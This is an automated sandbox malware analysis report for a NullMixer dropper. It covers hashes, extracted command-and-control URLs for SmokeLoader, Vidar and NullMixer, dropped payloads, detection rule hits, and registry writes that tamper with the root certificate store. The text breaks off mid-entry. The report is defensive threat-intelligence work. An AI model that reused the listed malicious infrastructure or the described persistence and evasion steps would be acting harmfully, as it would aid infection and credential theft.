nullmixer | f52e34603c58c806081a09fc4ba38eabe1e3f12b7a57a75353ecf593177fa7ef

Analysis

max time kernel
131s
max time network
150s
platform
windows7_x64
resource
win7-20231129-en
resource tags

arch:x64arch:x86image:win7-20231129-enlocale:en-usos:windows7-x64system
submitted
01/02/2024, 16:51

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

8765c39cc6647adc171220b11942422b.exe
Size

3.3MB
MD5

8765c39cc6647adc171220b11942422b
SHA1

5a45fd626dcf26b1f933e5a18db138fe1df64444
SHA256

f52e34603c58c806081a09fc4ba38eabe1e3f12b7a57a75353ecf593177fa7ef
SHA512

8c5bf35e5d6dc7aab1bff4836ef00e44d7e158d4b8d3f9bcf9ebb39a02b21078c5879f061ac926aa52b9a0f9a83752f322db1d98c1a2908a9ec5eed60919fa65
SSDEEP

98304:xpeKfE9KlGB9z8qTsF5iOew3qrCvLUBsKxp:x8/9HHoGDQLUCKxp

Score

10^/10

nullmixer privateloader risepro smokeloader vidar xmrig 706 pub6 aspackv2 backdoor dropper loader miner spyware stealer trojan

Malware Config

Extracted

Family

nullmixer

http://znegs.xyz/

Extracted

Family

smokeloader

Botnet

pub6

Extracted

Family

vidar

Version

39.9

Botnet

706

https://prophefliloc.tumblr.com/

Attributes

profile_id
706

Extracted

Family

smokeloader

Version

2020

http://aucmoney.com/upload/

http://thegymmum.com/upload/

http://atvcampingtrips.com/upload/

http://kuapakualaman.com/upload/

http://renatazarazua.com/upload/

http://nasufmutlu.com/upload/

rc4.i32

Signatures

NullMixer
NullMixer is a malware dropper leading to an infection chain of a wide variety of malware families.
dropper nullmixer
PrivateLoader
PrivateLoader is a downloader sold as a pay-per-install malware distribution service.
loader privateloader
RisePro
RisePro stealer is an infostealer distributed by PrivateLoader.
stealer risepro
SmokeLoader
Modular backdoor trojan in use since 2014.
trojan backdoor smokeloader
Vidar
Vidar is an infostealer based on Arkei stealer.
stealer vidar
xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
miner xmrig

Vidar Stealer 5 IoCs

stealer

resource	yara_rule
behavioral1/memory/1792-253-0x00000000046A0000-0x000000000473D000-memory.dmp	family_vidar
behavioral1/memory/2500-244-0x0000000000260000-0x0000000000360000-memory.dmp	family_vidar
behavioral1/memory/1792-272-0x0000000000400000-0x0000000002CC2000-memory.dmp	family_vidar
behavioral1/memory/1792-345-0x0000000000400000-0x0000000002CC2000-memory.dmp	family_vidar
behavioral1/memory/1792-442-0x00000000046A0000-0x000000000473D000-memory.dmp	family_vidar

XMRig Miner payload 2 IoCs

miner

resource	yara_rule
behavioral1/memory/2384-536-0x0000000140000000-0x0000000140786000-memory.dmp	xmrig
behavioral1/memory/2384-562-0x0000000140000000-0x0000000140786000-memory.dmp	xmrig

ASPack v2.12-2.42 4 IoCs

Detects executables packed with ASPack v2.12-2.42

aspackv2

resource	yara_rule
behavioral1/files/0x0006000000015d0f-31.dat	aspack_v212_v242
behavioral1/files/0x0007000000015ce6-46.dat	aspack_v212_v242
behavioral1/files/0x0007000000015cc4-48.dat	aspack_v212_v242
behavioral1/files/0x0006000000015cfa-54.dat	aspack_v212_v242

Executes dropped EXE 18 IoCs

pid	Process
2644	setup_install.exe
2528	zaiqa_1.exe
2828	zaiqa_4.exe
1172	zaiqa_6.exe
2500	zaiqa_2.exe
2016	zaiqa_8.exe
948	zaiqa_5.exe
2428	zaiqa_9.exe
1792	zaiqa_3.exe
840	zaiqa_7.exe
1472	zaiqa_9.exe
2252	zaiqa_5.exe
3032	zaiqa_1.exe
1768	chrome2.exe
3008	setup.exe
892	winnetdriv.exe
1068	services64.exe
1740	sihost64.exe

Loads dropped DLL 43 IoCs

pid	Process
2356	8765c39cc6647adc171220b11942422b.exe
2356	8765c39cc6647adc171220b11942422b.exe
2356	8765c39cc6647adc171220b11942422b.exe
2644	setup_install.exe
2644	setup_install.exe
2644	setup_install.exe
2644	setup_install.exe
2644	setup_install.exe
2644	setup_install.exe
2644	setup_install.exe
2644	setup_install.exe
2952	cmd.exe
1484	cmd.exe
2952	cmd.exe
3020	cmd.exe
3020	cmd.exe
2964	cmd.exe
1976	cmd.exe
2528	zaiqa_1.exe
2528	zaiqa_1.exe
2828	zaiqa_4.exe
2828	zaiqa_4.exe
2500	zaiqa_2.exe
2500	zaiqa_2.exe
2148	cmd.exe
1892	cmd.exe
2148	cmd.exe
840	zaiqa_7.exe
840	zaiqa_7.exe
1792	zaiqa_3.exe
1792	zaiqa_3.exe
2528	zaiqa_1.exe
2828	zaiqa_4.exe
2828	zaiqa_4.exe
3032	zaiqa_1.exe
3032	zaiqa_1.exe
3008	setup.exe
2236	WerFault.exe
2236	WerFault.exe
2236	WerFault.exe
2236	WerFault.exe
1768	chrome2.exe
1068	services64.exe

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Legitimate hosting services abused for malware hosting/C2 1 TTPs 7 IoCs

Web Service

T1102

flow	ioc
102	iplogger.org
103	iplogger.org
109	iplogger.org
333	raw.githubusercontent.com
334	raw.githubusercontent.com
352	pastebin.com
353	pastebin.com

Looks up external IP address via web service 4 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
19	api.db-ip.com
21	api.db-ip.com
4	ipinfo.io
5	ipinfo.io

Suspicious use of SetThreadContext 1 IoCs

description	pid	Process	procid_target
PID 1068 set thread context of 2384	1068	services64.exe	68

Drops file in Windows directory 2 IoCs

description	ioc	Process
File created	C:\Windows\winnetdriv.exe	setup.exe
File opened for modification	C:\Windows\winnetdriv.exe	setup.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Program crash 1 IoCs

pid	pid_target	Process	procid_target
2236	2644	WerFault.exe	28

Checks SCSI registry key(s) 3 TTPs 3 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

description	ioc	Process
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	zaiqa_2.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	zaiqa_2.exe
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	zaiqa_2.exe

Creates scheduled task(s) 1 TTPs 2 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task/Job

T1053

pid	Process
1644	schtasks.exe
1964	schtasks.exe

Modifies system certificate store 2 TTPs 17 IoCs

evasion spyware trojan

Install Root Certificate

T1553.004

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8	zaiqa_6.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8\Blob = 0400000001000000100000000cd2f9e0da1773e9ed864da5e370e74e14000000010000001400000079b459e67bb6e5e40173800888c81a58f6e99b6e030000000100000014000000cabd2a79a1076a31f21d253635cb039d4329a5e80f00000001000000200000003f0411ede9c4477057d57e57883b1f205b20cdc0f3263129b1ee0269a2678f631900000001000000100000002fe1f70bb05d7c92335bc5e05b984da620000000010000006f0500003082056b30820353a0030201020211008210cfb0d240e3594463e0bb63828b00300d06092a864886f70d01010b0500304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f74205831301e170d3135303630343131303433385a170d3335303630343131303433385a304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f7420583130820222300d06092a864886f70d01010105000382020f003082020a0282020100ade82473f41437f39b9e2b57281c87bedcb7df38908c6e3ce657a078f775c2a2fef56a6ef6004f28dbde68866c4493b6b163fd14126bbf1fd2ea319b217ed1333cba48f5dd79dfb3b8ff12f1219a4bc18a8671694a66666c8f7e3c70bfad292206f3e4c0e680aee24b8fb7997e94039fd347977c99482353e838ae4f0a6f832ed149578c8074b6da2fd0388d7b0370211b75f2303cfa8faeddda63abeb164fc28e114b7ecf0be8ffb5772ef4b27b4ae04c12250c708d0329a0e15324ec13d9ee19bf10b34a8c3f89a36151deac870794f46371ec2ee26f5b9881e1895c34796c76ef3b906279e6dba49a2f26c5d010e10eded9108e16fbb7f7a8f7c7e50207988f360895e7e237960d36759efb0e72b11d9bbc03f94905d881dd05b42ad641e9ac0176950a0fd8dfd5bd121f352f28176cd298c1a80964776e4737baceac595e689d7f72d689c50641293e593edd26f524c911a75aa34c401f46a199b5a73a516e863b9e7d72a712057859ed3e5178150b038f8dd02f05b23e7b4a1c4b730512fcc6eae050137c439374b3ca74e78e1f0108d030d45b7136b407bac130305c48b7823b98a67d608aa2a32982ccbabd83041ba2830341a1d605f11bc2b6f0a87c863b46a8482a88dc769a76bf1f6aa53d198feb38f364dec82b0d0a28fff7dbe21542d422d0275de179fe18e77088ad4ee6d98b3ac6dd27516effbc64f533434f0203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e0416041479b459e67bb6e5e40173800888c81a58f6e99b6e300d06092a864886f70d01010b05000382020100551f58a9bcb2a850d00cb1d81a6920272908ac61755c8a6ef882e5692fd5f6564bb9b8731059d321977ee74c71fbb2d260ad39a80bea17215685f1500e59ebcee059e9bac915ef869d8f8480f6e4e99190dc179b621b45f06695d27c6fc2ea3bef1fcfcbd6ae27f1a9b0c8aefd7d7e9afa2204ebffd97fea912b22b1170e8ff28a345b58d8fc01c954b9b826cc8a8833894c2d843c82dfee965705ba2cbbf7c4b7c74e3b82be31c822737392d1c280a43939103323824c3c9f86b255981dbe29868c229b9ee26b3b573a82704ddc09c789cb0a074d6ce85d8ec9efceabc7bbb52b4e45d64ad026cce572ca086aa595e315a1f7a4edc92c5fa5fbffac28022ebed77bbbe3717b9016d3075e46537c3707428cd3c4969cd599b52ae0951a8048ae4c3907cecc47a452952bbab8fbadd233537de51d4d6dd5a1b1c7426fe64027355ca328b7078de78d3390e7239ffb509c796c46d5b415b3966e7e9b0c963ab8522d3fd65be1fb08c284fe24a8a389daac6ae1182ab1a843615bd31fdc3b8d76f22de88d75df17336c3d53fb7bcb415fffdca2d06138e196b8ac5d8b37d775d533c09911ae9d41c1727584be0241425f67244894d19b27be073fb9b84f817451e17ab7ed9d23e2bee0d52804133c31039edd7a6c8fc60718c67fde478e3f289e0406cfa5543477bdec899be91743df5bdb5ffe8e1e57a2cd409d7e6222dade1827	zaiqa_6.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13\Blob = 040000000100000010000000410352dc0ff7501b16f0028eba6f45c50f00000001000000140000005bcaa1c2780f0bcb5a90770451d96f38963f012d0b000000010000001e000000440053005400200052006f006f0074002000430041002000580033000000090000000100000016000000301406082b0601050507030406082b06010505070301140000000100000014000000c4a7b1a47b2c71fadbe14b9075ffc415608589101d00000001000000100000004558d512eecb27464920897de7b66053030000000100000014000000dac9024f54d8f6df94935fb1732638ca6ad77c131900000001000000100000006cf252fec3e8f20996de5d4dd9aef42420000000010000004e0300003082034a30820232a003020102021044afb080d6a327ba893039862ef8406b300d06092a864886f70d0101050500303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f74204341205833301e170d3030303933303231313231395a170d3231303933303134303131355a303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f7420434120583330820122300d06092a864886f70d01010105000382010f003082010a0282010100dfafe99750088357b4cc6265f69082ecc7d32c6b30ca5becd9c37dc740c118148be0e83376492ae33f214993ac4e0eaf3e48cb65eefcd3210f65d22ad9328f8ce5f777b0127bb595c089a3a9baed732e7a0c063283a27e8a1430cd11a0e12a38b9790a31fd50bd8065dfb7516383c8e28861ea4b6181ec526bb9a2e24b1a289f48a39e0cda098e3e172e1edd20df5bc62a8aab2ebd70adc50b1a25907472c57b6aab34d63089ffe568137b540bc8d6aeec5a9c921e3d64b38cc6dfbfc94170ec1672d526ec38553943d0fcfd185c40f197ebd59a9b8d1dbada25b9c6d8dfc115023aabda6ef13e2ef55c089c3cd68369e4109b192ab62957e3e53d9b9ff0025d0203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020106301d0603551d0e04160414c4a7b1a47b2c71fadbe14b9075ffc41560858910300d06092a864886f70d01010505000382010100a31a2c9b17005ca91eee2866373abf83c73f4bc309a095205de3d95944d23e0d3ebd8a4ba0741fce10829c741a1d7e981addcb134bb32044e491e9ccfc7da5db6ae5fee6fde04eddb7003ab57049aff2e5eb02f1d1028b19cb943a5e48c4181e58195f1e025af00cf1b1ada9dc59868b6ee991f586cafab96633aa595bcee2a7167347cb2bcc99b03748cfe3564bf5cf0f0c723287c6f044bb53726d43f526489a5267b758abfe67767178db0da256141339243185a2a8025a3047e1dd5007bc02099000eb6463609b16bc88c912e6d27d918bf93d328d65b4e97cb15776eac5b62839bf15651cc8f677966a0a8d770bd8910b048e07db29b60aee9d82353510	zaiqa_6.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\A8985D3A65E5E5C4B2D7D66D40C6DD2FB19C5436\Blob = 1900000001000000100000000f3a0527d242de2dc98e5cfcb1e991ee0f0000000100000014000000b34ddd372ed92e8f2abfbb9e20a9d31f204f194b090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b0601050507030814000000010000001400000003de503556d14cbb66f0a3e21b1bc397b23dd1550b00000001000000120000004400690067006900430065007200740000001d000000010000001000000059779e39e21a2e3dfced6857ed5c5fd9030000000100000014000000a8985d3a65e5e5c4b2d7d66d40c6dd2fb19c543604000000010000001000000079e4a9840d7d3a96d7c04fe2434c892e2000000001000000b3030000308203af30820297a0030201020210083be056904246b1a1756ac95991c74a300d06092a864886f70d01010505003061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100e23be11172dea8a4d3a357aa50a28f0b7790c9a2a5ee12ce965b010920cc0193a74e30b753f743c46900579de28d22dd870640008109cece1b83bfdfcd3b7146e2d666c705b37627168f7b9e1e957deeb748a308dad6af7a0c3906657f4a5d1fbc17f8abbeee28d7747f7a78995985686e5c23324bbf4ec0e85a6de370bf7710bffc01f685d9a844105832a97518d5d1a2be47e2276af49a33f84908608bd45fb43a84bfa1aa4a4c7d3ecf4f5f6c765ea04b37919edc22e66dce141a8e6acbfecdb3146417c75b299e32bff2eefad30b42d4abb74132da0cd4eff881d5bb8d583fb51be84928a270da3104ddf7b216f24c0a4e07a8ed4a3d5eb57fa390c3af270203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041403de503556d14cbb66f0a3e21b1bc397b23dd155301f0603551d2304183016801403de503556d14cbb66f0a3e21b1bc397b23dd155300d06092a864886f70d01010505000382010100cb9c37aa4813120afadd449c4f52b0f4dfae04f5797908a32418fc4b2b84c02db9d5c7fef4c11f58cbb86d9c7a74e79829ab11b5e370a0a1cd4c8899938c9170e2ab0f1cbe93a9ff63d5e40760d3a3bf9d5b09f1d58ee353f48e63fa3fa7dbb466df6266d6d16e418df22db5ea774a9f9d58e22b59c04023ed2d2882453e7954922698e08048a837eff0d6796016deace80ecd6eac4417382f49dae1453e2ab93653cf3a5006f72ee8c457496c612118d504ad783c2c3a806ba7ebaf1514e9d889c1b9386ce2916c8aff64b977255730c01b24a3e1dce9df477cb5b424080530ec2dbd0bbf45bf50b9a9f3eb980112adc888c698345f8d0a3cc6e9d595956dde	services64.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D4DE20D05E66FC53FE1A50882C78DB2852CAE474	zaiqa_7.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D4DE20D05E66FC53FE1A50882C78DB2852CAE474\Blob = 0f0000000100000014000000ce0e658aa3e847e467a147b3049191093d055e6f0b0000000100000034000000420061006c00740069006d006f007200650020004300790062006500720054007200750073007400200052006f006f007400000053000000010000002400000030223020060a2b06010401b13e01640130123010060a2b0601040182373c0101030200c0140000000100000014000000e59d5930824758ccacfa085436867b3ab5044df01d0000000100000010000000918ad43a9475f78bb5243de886d8103c09000000010000000c000000300a06082b06010505070301030000000100000014000000d4de20d05e66fc53fe1a50882c78db2852cae47420000000010000007b030000308203773082025fa0030201020204020000b9300d06092a864886f70d0101050500305a310b300906035504061302494531123010060355040a130942616c74696d6f726531133011060355040b130a43796265725472757374312230200603550403131942616c74696d6f7265204379626572547275737420526f6f74301e170d3030303531323138343630305a170d3235303531323233353930305a305a310b300906035504061302494531123010060355040a130942616c74696d6f726531133011060355040b130a43796265725472757374312230200603550403131942616c74696d6f7265204379626572547275737420526f6f7430820122300d06092a864886f70d01010105000382010f003082010a0282010100a304bb22ab983d57e826729ab579d429e2e1e89580b1b0e35b8e2b299a64dfa15dedb009056ddb282ece62a262feb488da12eb38eb219dc0412b01527b8877d31c8fc7bab988b56a09e773e81140a7d1ccca628d2de58f0ba650d2a850c328eaf5ab25878a9a961ca967b83f0cd5f7f952132fc21bd57070f08fc012ca06cb9ae1d9ca337a77d6f8ecb9f16844424813d2c0c2a4ae5e60feb6a605fcb4dd075902d459189863f5a563e0900c7d5db2067af385eaebd403ae5e843e5fff15ed69bcf939367275cf77524df3c9902cb93de5c923533f1f2498215c079929bdc63aece76e863a6b97746333bd681831f0788d76bffc9e8e5d2a86a74d90dc271a390203010001a3453043301d0603551d0e04160414e59d5930824758ccacfa085436867b3ab5044df030120603551d130101ff040830060101ff020103300e0603551d0f0101ff040403020106300d06092a864886f70d01010505000382010100850c5d8ee46f51684205a0ddbb4f27258403bdf764fd2dd730e3a41017ebda2929b6793f76f6191323b8100af958a4d46170bd04616a128a17d50abdc5bc307cd6e90c258d86404feccca37e38c637114feddd68318e4cd2b30174eebe755e07481a7f70ff165c84c07985b805fd7fbe6511a30fc002b4f852373904d5a9317a18bfa02af41299f7a34582e33c5ef59d9eb5c89e7c2ec8a49e4e08144b6dfd706d6b1a63bd64e61fb7cef0f29f2ebb1bb7f250887392c2e2e3168d9a3202ab8e18dde91011ee7e35ab90af3e30947ad0333da7650ff5fc8e9e62cf47442c015dbb1db532d247d2382ed0fe81dc326a1eb5ee3cd5fce7811d19c32442ea6339a9	zaiqa_7.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 0f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b0601050507030853000000010000002600000030243022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c00b00000001000000180000004300b7004f00b7004d00b7004f00b7004400b7004f000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e349200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e	zaiqa_8.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349	zaiqa_8.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 1900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa2030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491d00000001000000100000002e0d6875874a44c820912e85e964cfdb140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b40b00000001000000180000004300b7004f00b7004d00b7004f00b7004400b7004f00000053000000010000002600000030243022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703080f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e	zaiqa_8.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13	zaiqa_6.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13\Blob = 1900000001000000100000006cf252fec3e8f20996de5d4dd9aef424030000000100000014000000dac9024f54d8f6df94935fb1732638ca6ad77c131d00000001000000100000004558d512eecb27464920897de7b66053140000000100000014000000c4a7b1a47b2c71fadbe14b9075ffc41560858910090000000100000016000000301406082b0601050507030406082b060105050703010b000000010000001e000000440053005400200052006f006f00740020004300410020005800330000000f00000001000000140000005bcaa1c2780f0bcb5a90770451d96f38963f012d20000000010000004e0300003082034a30820232a003020102021044afb080d6a327ba893039862ef8406b300d06092a864886f70d0101050500303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f74204341205833301e170d3030303933303231313231395a170d3231303933303134303131355a303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f7420434120583330820122300d06092a864886f70d01010105000382010f003082010a0282010100dfafe99750088357b4cc6265f69082ecc7d32c6b30ca5becd9c37dc740c118148be0e83376492ae33f214993ac4e0eaf3e48cb65eefcd3210f65d22ad9328f8ce5f777b0127bb595c089a3a9baed732e7a0c063283a27e8a1430cd11a0e12a38b9790a31fd50bd8065dfb7516383c8e28861ea4b6181ec526bb9a2e24b1a289f48a39e0cda098e3e172e1edd20df5bc62a8aab2ebd70adc50b1a25907472c57b6aab34d63089ffe568137b540bc8d6aeec5a9c921e3d64b38cc6dfbfc94170ec1672d526ec38553943d0fcfd185c40f197ebd59a9b8d1dbada25b9c6d8dfc115023aabda6ef13e2ef55c089c3cd68369e4109b192ab62957e3e53d9b9ff0025d0203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020106301d0603551d0e04160414c4a7b1a47b2c71fadbe14b9075ffc41560858910300d06092a864886f70d01010505000382010100a31a2c9b17005ca91eee2866373abf83c73f4bc309a095205de3d95944d23e0d3ebd8a4ba0741fce10829c741a1d7e981addcb134bb32044e491e9ccfc7da5db6ae5fee6fde04eddb7003ab57049aff2e5eb02f1d1028b19cb943a5e48c4181e58195f1e025af00cf1b1ada9dc59868b6ee991f586cafab96633aa595bcee2a7167347cb2bcc99b03748cfe3564bf5cf0f0c723287c6f044bb53726d43f526489a5267b758abfe67767178db0da256141339243185a2a8025a3047e1dd5007bc02099000eb6463609b16bc88c912e6d27d918bf93d328d65b4e97cb15776eac5b62839bf15651cc8f677966a0a8d770bd8910b048e07db29b60aee9d82353510	zaiqa_6.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\A8985D3A65E5E5C4B2D7D66D40C6DD2FB19C5436	services64.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D4DE20D05E66FC53FE1A50882C78DB2852CAE474\Blob = 040000000100000010000000acb694a59c17e0d791529bb19706a6e4030000000100000014000000d4de20d05e66fc53fe1a50882c78db2852cae47409000000010000000c000000300a06082b060105050703011d0000000100000010000000918ad43a9475f78bb5243de886d8103c140000000100000014000000e59d5930824758ccacfa085436867b3ab5044df053000000010000002400000030223020060a2b06010401b13e01640130123010060a2b0601040182373c0101030200c00b0000000100000034000000420061006c00740069006d006f007200650020004300790062006500720054007200750073007400200052006f006f00740000000f0000000100000014000000ce0e658aa3e847e467a147b3049191093d055e6f20000000010000007b030000308203773082025fa0030201020204020000b9300d06092a864886f70d0101050500305a310b300906035504061302494531123010060355040a130942616c74696d6f726531133011060355040b130a43796265725472757374312230200603550403131942616c74696d6f7265204379626572547275737420526f6f74301e170d3030303531323138343630305a170d3235303531323233353930305a305a310b300906035504061302494531123010060355040a130942616c74696d6f726531133011060355040b130a43796265725472757374312230200603550403131942616c74696d6f7265204379626572547275737420526f6f7430820122300d06092a864886f70d01010105000382010f003082010a0282010100a304bb22ab983d57e826729ab579d429e2e1e89580b1b0e35b8e2b299a64dfa15dedb009056ddb282ece62a262feb488da12eb38eb219dc0412b01527b8877d31c8fc7bab988b56a09e773e81140a7d1ccca628d2de58f0ba650d2a850c328eaf5ab